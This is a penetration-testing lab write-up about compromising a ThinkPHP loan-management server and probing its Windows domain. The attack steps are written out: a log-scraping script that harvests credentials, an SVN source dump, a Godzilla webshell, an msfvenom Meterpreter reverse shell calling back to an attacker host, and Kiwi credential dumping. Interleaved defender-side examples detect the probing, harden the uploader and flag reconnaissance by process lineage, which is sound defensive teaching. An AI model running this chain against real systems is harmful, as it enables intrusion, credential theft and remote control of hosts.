Information Gathering
Target IP: 192.168.0.104
Port Scanning
Perform full port scanning using masscan for speed, followed by detailed nmap scanning of open ports:
masscan -p 1-65535 192.168.0.104 --rate=1000
Open ports 445 and 3389 indicate a Windows server, and port 3306 (seen in the full scan) a MySQL database. The web service on port 80 displays a PHPStudy default page.
Detailed nmap scan with service detection and vulnerability assessment:
nmap -p 3306,445,3389,80,47001,49152,49156,49153,135,49157 -sS -sC -A 192.168.0.104 -oA target-scan
Scan reveals DNS resolution requirements. Domain binding is necessary for proper access.
Domain Configuration
Modify hosts file to bind domain www.webhack123.com to target IP. Accessing http://www.webhack123.com/ reveals a loan management system.
Initial Access Vector
Framework Vulnerability Analysis
Wappalyzer identifies ThinkPHP framework. Error reporting provides absolute path: C:\phpstudy_pro\WWW\www.webhack123.com\Base\Common\functions.php
ThinkPHP 3.x log disclosure vulnerability exists at http://www.webhack123.com/App/Runtime/Logs/. Database credentials and admin passwords are exposed in error logs containing SQL execution details.
Python script to parse logs and extract credentials:
import requests
import datetime

def fetch_log_credentials(base_url):
    # ThinkPHP 3.x names daily logs yy_mm_dd.log; try the last few years.
    current_year = datetime.datetime.now().year
    credential_data = []
    for year in range(current_year - 3, current_year + 1):
        for month in range(1, 13):
            for day in range(1, 32):
                log_name = f"{year % 100:02d}_{month:02d}_{day:02d}.log"
                log_url = f"{base_url}{log_name}"
                try:
                    response = requests.get(log_url, timeout=5)
                    if response.status_code == 200 and "password" in response.text:
                        credential_data.append(response.text)
                        print(f"Found credentials in: {log_url}")
                except requests.RequestException:
                    # Non-existent dates and timeouts are simply skipped.
                    continue
    return credential_data

log_base = "http://www.webhack123.com/App/Runtime/Logs/"
credentials = fetch_log_credentials(log_base)
with open("extracted_creds.txt", "w", encoding="utf-8") as output_file:
    for data in credentials:
        output_file.write(data + "\n")
Analysis reveals database credentials in recent log files. Successful decryption yields admin credentials: admin/web123.
Administrative Interface Discovery
Directory scanning fails to identify admin panel but reveals SVN source code disclosure vulnerability at http://www.webhack123.com/.svn
SVN source code extraction:
python SvnExploit.py -u http://www.webhack123.com/.svn --dump
Examination of downloaded source code reveals administrative subdomain information. Additional hosts entry required for subdomain access.
Access administrative interface with obtained credentials at discovered subdomain.
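Both disclosure paths used so far (the ThinkPHP runtime logs under /App/Runtime/Logs/ and the exposed /.svn directory) leave a distinctive trail in the web server's access log. The following is an added defender-side example, not code from the write-up: it parses constructed Apache/nginx-style access-log lines, flags requests for those paths, distinguishes enumeration (many 404 probes from one client, the shape the date-iterating script above produces) from actual disclosure (a 200 response), and reports both. The client IPs, timestamps and log file names are constructed; the path patterns are taken from the write-up.

```python
# Added example: detect probing and disclosure of ThinkPHP runtime logs and
# an exposed .svn directory from web-server access logs. Sample lines are
# constructed; only the URL paths mirror the write-up.
import re
from collections import Counter

# Constructed sample: one ordinary request, a burst of log-file probes,
# one successful log fetch, and a successful .svn database fetch.
SAMPLE_ACCESS_LOG = """\
192.168.11.115 - - [10/Mar/2024:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 5120
192.168.11.115 - - [10/Mar/2024:10:00:02 +0800] "GET /App/Runtime/Logs/24_03_01.log HTTP/1.1" 404 230
192.168.11.115 - - [10/Mar/2024:10:00:02 +0800] "GET /App/Runtime/Logs/24_03_02.log HTTP/1.1" 404 230
192.168.11.115 - - [10/Mar/2024:10:00:03 +0800] "GET /App/Runtime/Logs/24_03_09.log HTTP/1.1" 200 48211
192.168.11.115 - - [10/Mar/2024:10:00:09 +0800] "GET /.svn/wc.db HTTP/1.1" 200 917504
192.168.0.55 - - [10/Mar/2024:10:01:00 +0800] "GET /Public/css/style.css HTTP/1.1" 200 812
"""

# Common log format: ip ident user [time] "METHOD path PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# The two disclosure locations discussed in the write-up.
RUNTIME_LOG = re.compile(r'/Runtime/Logs/', re.IGNORECASE)
SVN_DIR = re.compile(r'/\.svn(/|$)')


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry['status'] = int(entry['status'])
    return entry


def classify(entry):
    """Label a parsed request as 'runtime-log', 'svn', or None."""
    path = entry['path']
    if RUNTIME_LOG.search(path):
        return 'runtime-log'
    if SVN_DIR.search(path):
        return 'svn'
    return None


def detect_disclosure(log_text, probe_threshold=3):
    """Return per-client probe counts, the requests that were actually
    served (status 200 = real disclosure), and clients whose probe count
    reaches the enumeration threshold."""
    probes = Counter()
    served = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        kind = classify(entry)
        if kind is None:
            continue
        probes[(entry['ip'], kind)] += 1
        if entry['status'] == 200:
            served.append((entry['ip'], kind, entry['path']))
    scanning = [key for key, n in probes.items() if n >= probe_threshold]
    return {'probes': dict(probes), 'served': served, 'scanning': scanning}


if __name__ == '__main__':
    findings = detect_disclosure(SAMPLE_ACCESS_LOG)
    for ip, kind, path in findings['served']:
        print(f"DISCLOSED {kind}: {ip} fetched {path}")
    for ip, kind in findings['scanning']:
        count = findings['probes'][(ip, kind)]
        print(f"ENUMERATION {kind}: {ip} made {count} requests")
```

A 200 on either path is the actionable finding: the fix is to deny web access to the Runtime directory and to strip .svn (and similar VCS metadata) from the document root, in addition to disabling error log output that embeds SQL parameters.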
Webshell Deployment
System configuration allows modification of uploadable file extensions. Deploy Godzilla webshell through file upload functionality.
Verify shell execution with administrator privileges. Prepare for Meterpreter session establishment.
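The upload step works only because the application lets an administrator edit the list of permitted extensions, so an admin account is enough to allow PHP uploads. As an added example (not the loan system's code, whose actual implementation is not on the page), the block below contrasts that weak design with a server-side check that refuses executable extensions regardless of the editable configuration, inspects every dotted segment so double extensions are caught, and regenerates the stored file name. The configuration dictionary, the extension sets and the sample file names are constructed assumptions.

```python
# Added example: weak, config-driven upload filter versus a hardened one.
# The config dictionary and extension lists are constructed assumptions.
import os
import re
import secrets

# Weak design: the allowlist lives in a config that the admin panel can
# edit, so anyone holding admin credentials can add "php" to it.
ADMIN_EDITABLE_CONFIG = {"upload_ext": ["jpg", "png", "gif", "pdf", "php"]}


def weak_is_allowed(filename, config=ADMIN_EDITABLE_CONFIG):
    """Only checks the last extension against the editable list."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in config["upload_ext"]


# Hardened design: extensions the web server may execute are refused no
# matter what the editable config says; the allowlist is applied on top.
# The executable list is an assumption for a PHPStudy/Apache-style host.
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                     "phps", "asp", "aspx", "jsp", "htaccess"}
SAFE_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
FILENAME_CHARS = re.compile(r"^[A-Za-z0-9_.-]+$")


def hardened_check(filename, config=ADMIN_EDITABLE_CONFIG):
    """Return (True, ext) for an acceptable upload or (False, reason).
    Every dotted segment is examined, so 'shell.php.jpg' and
    'shell.jpg.php' are both refused."""
    name = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in name or not FILENAME_CHARS.match(name):
        return False, "bad characters in name"
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "no extension"
    segments = parts[1:]
    if any(seg in SERVER_EXECUTABLE for seg in segments):
        return False, "executable extension refused regardless of config"
    ext = segments[-1]
    if ext not in SAFE_EXTENSIONS or ext not in config["upload_ext"]:
        return False, f"extension '{ext}' not permitted"
    return True, ext


def stored_name(filename):
    """Name to store the file under: random token plus the validated
    extension, so the client never controls the on-disk name."""
    ok, ext = hardened_check(filename)
    if not ok:
        raise ValueError(ext)
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for candidate in ["photo.JPG", "shell.php", "shell.php.jpg", ".htaccess"]:
        print(candidate, "weak:", weak_is_allowed(candidate),
              "hardened:", hardened_check(candidate))
```

The point of the hardened version is that the executable-extension refusal is not configurable: an attacker who obtains admin credentials, as happened here via the leaked logs, gains no path to code execution through the uploader. Serving the upload directory with script execution disabled is the complementary server-side control.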
Establishing Persistent Access
Payload Generation and Deployment
Create Windows reverse shell payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.11.115 LPORT=7799 -f exe > payload.exe
Initiate Metasploit handler (the handler payload must match the stageless payload generated above):
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST 192.168.11.115
set LPORT 7799
exploit
Upload and execute payload via webshell to establish Meterpreter session.
Domain Environment Reconnaissance
Background active session and perform process migration:
ps
migrate <process_id>
Load Kiwi module for credential extraction:
load kiwi
creds_all
Examine network configuration and ARP table for domain hosts:
ipconfig /all
arp -a
Analysis identifies 10.10.10.149 as domain controller based on network configuration and host relationships.
Shell encoding adjustment for proper output:
chcp 65001
Domain enumeration commands:
net view
net view /domain
net group /domain
Network connectivity issues limit domain host discovery to single visible system.
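From the defender's side, the activity in this section has a recognisable shape on the victim host: a web-server worker process spawning a command shell that runs net view, net group /domain, arp -a and ipconfig /all. The block below is an added example, not part of the write-up: it scores constructed Windows process-creation events (fields loosely follow Sysmon Event ID 1) by walking each process's parent chain back to a web worker and matching the command line against those reconnaissance commands. The process names treated as web workers are an assumption for a PHPStudy host; the PIDs and command lines are constructed.

```python
# Added example: flag reconnaissance commands whose process lineage leads
# back to a web-server worker. Events are constructed; web-worker names
# are an assumption for a PHPStudy (Apache + php-cgi) host.
import re

WEB_WORKERS = {"php-cgi.exe", "httpd.exe", "nginx.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Command-line patterns for the enumeration steps used in the write-up.
RECON = [
    (re.compile(r"\bnet(1)?(\.exe)?\s+view\b", re.I), "net view"),
    (re.compile(r"\bnet(1)?(\.exe)?\s+group\b.*\s/domain\b", re.I), "domain group enumeration"),
    (re.compile(r"\barp(\.exe)?\s+-a\b", re.I), "arp cache dump"),
    (re.compile(r"\bipconfig(\.exe)?\s+/all\b", re.I), "ipconfig /all"),
]

# Constructed process-creation events: the php-cgi worker, the shell it
# spawned, two net.exe children, and an unrelated interactive net view.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3900, "image": "php-cgi.exe", "parent_image": "httpd.exe",
     "cmdline": "php-cgi.exe"},
    {"pid": 5204, "ppid": 4120, "image": "cmd.exe", "parent_image": "php-cgi.exe",
     "cmdline": 'cmd.exe /c "chcp 65001 && net view /domain"'},
    {"pid": 5210, "ppid": 5204, "image": "net.exe", "parent_image": "cmd.exe",
     "cmdline": "net view /domain"},
    {"pid": 5222, "ppid": 5204, "image": "net.exe", "parent_image": "cmd.exe",
     "cmdline": 'net group "Domain Admins" /domain'},
    {"pid": 6001, "ppid": 780, "image": "net.exe", "parent_image": "explorer.exe",
     "cmdline": "net view"},
]


def lineage(event, by_pid, max_depth=5):
    """Ancestor image names, nearest first. When a parent is not in the
    event set, fall back to the parent_image recorded on the child."""
    chain = []
    cur = event
    for _ in range(max_depth):
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            chain.append(cur["parent_image"].lower())
            break
        chain.append(parent["image"].lower())
        cur = parent
    return chain


def analyse(events):
    """Return alerts: high = recon command with web-worker lineage,
    medium = shell spawned by a web worker, low = recon without it."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        web_origin = any(img in WEB_WORKERS for img in lineage(e, by_pid))
        tags = [label for pattern, label in RECON if pattern.search(e["cmdline"])]
        is_shell = e["image"].lower() in SHELLS
        if web_origin and tags:
            severity = "high"
        elif web_origin and is_shell:
            severity = "medium"
        elif tags:
            severity = "low"
        else:
            continue
        alerts.append({"pid": e["pid"], "severity": severity,
                       "web_origin": web_origin, "tags": tags})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_EVENTS):
        print(alert)
```

The lineage check is what separates the webshell case from an administrator typing net view at a console: the same command from explorer.exe scores low, while anything descending from php-cgi.exe or httpd.exe scores high. The migrate step earlier in the write-up breaks this chain for later commands, which is why the shell-spawn itself (the medium case) deserves an alert on its own.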